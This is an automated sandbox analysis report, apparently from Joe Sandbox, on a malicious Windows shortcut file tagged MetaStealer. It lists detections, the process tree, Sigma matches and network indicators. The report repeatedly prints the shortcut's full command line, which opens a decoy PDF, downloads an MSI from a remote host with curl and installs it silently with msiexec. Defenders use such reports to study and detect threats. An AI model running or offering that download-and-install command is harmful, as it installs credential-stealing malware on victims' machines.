Edit tour

Windows Analysis Report
thUKanu6GD.lnk

Overview

General Information

Sample name:	thUKanu6GD.lnk renamed because original name is a hash value
Original sample name:	0a9302f5cbdcc6a3d75a904c947c9147.lnk
Analysis ID:	1632262
MD5:	0a9302f5cbdcc6a3d75a904c947c9147
SHA1:	7ede6ba3382299dc117f82aced5e51b1a0a01d24
SHA256:	e95e5480b291b646297e1bcbd6ab0eb3e4fec53084b714c26271973403e010f7
Tags:	lnkMetaStealeruser-abuse_ch
Infos:

Detection

HTMLPhisher, MalLnk

Score:	92
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected BlockedWebSite

Yara detected malicious lnk

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Windows shortcut file (LNK) contains suspicious command line arguments

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Enables debug privileges

IP address seen in connection with other malware

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: MsiExec Web Install

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7080 cmdline: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 6160 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 6720 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2088,i,11631974867291312252,14733990971221578511,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

curl.exe (PID: 6412 cmdline: curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

msiexec.exe (PID: 6660 cmdline: msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn MD5: E5DA170027542E25EDE42FC54C929077)

taskkill.exe (PID: 6736 cmdline: Taskkill /f /im cmd.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

msiexec.exe (PID: 6756 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msedge.exe (PID: 1080 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 7096 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 2664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6272 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 6956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6496 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

identity_helper.exe (PID: 6868 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)

identity_helper.exe (PID: 7132 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)

msedge.exe (PID: 8400 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7416 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:6 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6460 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
thUKanu6GD.lnk	JoeSecurity_MalLnk	Yara detected malicious lnk	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\bosfortuy.ms	JoeSecurity_BlockedWebSite	Yara detected BlockedWebSite	Joe Security

Sigma Signatures

System Summary

Sigma detected: MsiExec Web Install

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, ProcessId: 7080, ProcessName: cmd.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe, ProcessId: 7080, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://559236.na3.to/gift/setup4391.msi

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: thUKanu6GD.lnk	Virustotal: Detection: 19%			Perma Link
Source: thUKanu6GD.lnk	ReversingLabs: Detection: 13%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Phishing

Yara detected BlockedWebSite

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\bosfortuy.ms, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.6:50260 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 2.22.242.11 2.22.242.11
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 185.172.148.132 185.172.148.132
Source: Joe Sandbox View	IP Address: 172.64.41.3 172.64.41.3

Source: global traffic	HTTP traffic detected: GET /392171258/files/doc_downloads/test.pdf HTTP/1.1Host: s28.q4cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s28.q4cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: POST /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveContent-Length: 471Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: POST /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveContent-Length: 466Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.163
Source: unknown	TCP traffic detected without corresponding DNS query: 68.70.205.3
Source: unknown	TCP traffic detected without corresponding DNS query: 68.70.205.3
Source: unknown	TCP traffic detected without corresponding DNS query: 68.70.205.3
Source: unknown	TCP traffic detected without corresponding DNS query: 68.70.205.3
Source: unknown	TCP traffic detected without corresponding DNS query: 68.70.205.3
Source: unknown	TCP traffic detected without corresponding DNS query: 68.70.205.3
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.40.179.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.163

Source: global traffic	HTTP traffic detected: GET /392171258/files/doc_downloads/test.pdf HTTP/1.1Host: s28.q4cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s28.q4cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /gift/setup4391.msi HTTP/1.1Host: 559236.na3.toUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log6.12.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log6.12.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log6.12.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: 559236.na3.to
Source: global traffic	DNS traffic detected: DNS query: s28.q4cdn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: keycdnDate: Fri, 07 Mar 2025 20:40:16 GMTContent-Type: text/htmlContent-Length: 1439Connection: closeETag: "5ca0a75f-59f"X-Edge-Location: defr
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 20:40:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bk8D4yWya%2Fjc5IrEFAz%2Fp3eIVrswZsx1TQSQ8eGXyw81zSLyuWgJV4rIlEZ1avWrvHaaF8Be3JUY40BSpBHO8q8svSS8ln%2F2mWbmOtW0k1vzLVnw0yLGmja%2B2v4xGTb9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cce7dffed94217-EWRData Raw: 31 31 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 Data Ascii: 11d3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Suspected phishing site \| Cloudflare</title>

Source: curl.exe, 00000006.00000002.1292739432.000001BE71240000.00000004.00000020.00020000.00000000.sdmp, thUKanu6GD.lnk	String found in binary or memory: http://559236.na3.to/gift/setup4391.msi
Source: curl.exe, 00000006.00000003.1292046582.000001BE71256000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1292839683.000001BE71256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://559236.na3.to/gift/setup4391.msi2
Source: curl.exe, 00000006.00000003.1292046582.000001BE71256000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1292839683.000001BE71256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://559236.na3.to/gift/setup4391.msiV
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://bard.google.com/
Source: Reporting and NEL.13.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: service_worker_bin_prod.js.12.dr, offscreendocument_main.js.12.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: Web Data.12.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Web Data.12.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json.12.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.12.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: c3c0b809-94b6-4f44-893d-1b9e51a3b060.tmp.13.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json0.12.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: c3c0b809-94b6-4f44-893d-1b9e51a3b060.tmp.13.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: Reporting and NEL.13.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json0.12.dr	String found in binary or memory: https://docs.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
